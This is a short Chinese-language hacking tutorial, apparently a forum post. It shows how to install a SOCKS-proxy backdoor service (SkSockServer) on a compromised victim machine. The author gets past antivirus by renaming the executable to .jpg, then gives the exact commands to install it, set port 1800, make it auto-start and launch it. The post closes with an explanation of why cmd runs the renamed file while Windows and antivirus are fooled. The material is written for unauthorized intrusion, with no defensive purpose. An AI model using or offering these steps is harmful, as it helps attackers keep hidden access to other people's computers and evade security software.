我在肉鸡CMD下安装一个代理跳板后门。

执行:
E:\>SkSockServer -install

显示“拒绝访问”。
原因是被肉鸡上的杀毒软件拦截了!

怎么办?如何绕过杀毒软件或者防火墙?我把SkSockServer.exe改成SkSockServer.jpg,然后执行。

E:\>SkSockServer.jpg -install

Snake SockProxy Service installed.
  
E:\>SkSockServer.jpg -config port 1800

The Port value have set to 1800
  
E:\>SkSockServer.jpg -config starttype 2

The New StartType have set to 2 -- Auto

E:\>net start skserver
  
Snake SockProxy Service 服务正在启动 .
  
nake SockProxy Service 服务已经启动成功。

Ok!成功! 
  
现在我们不怕杀毒软件了!而其他的在命令行执行的程序也可以用这种方法。
  
原理讲解:

其实原理很简单,我们利用了cmd判定文件类型的方法。在CMD中,系统首先判定文件的类型是否是执行文件,判定方法不是文件扩展名,而是文件头的PE段。如是执行文件,则执行它。如不是,再根据相应的关联启动相应程序。如没有输入扩展名,则系统将默认扩展名为BAT,EXE,COM,依次判定。也就是说,程序更改了扩展名后,只有cmd.exe能“认”出它来,因为cmd不是根据扩展名来判定文件类型的。而Windows是靠扩展名来判定文件类型的。这样,我们就可以骗过Windows和杀毒软件。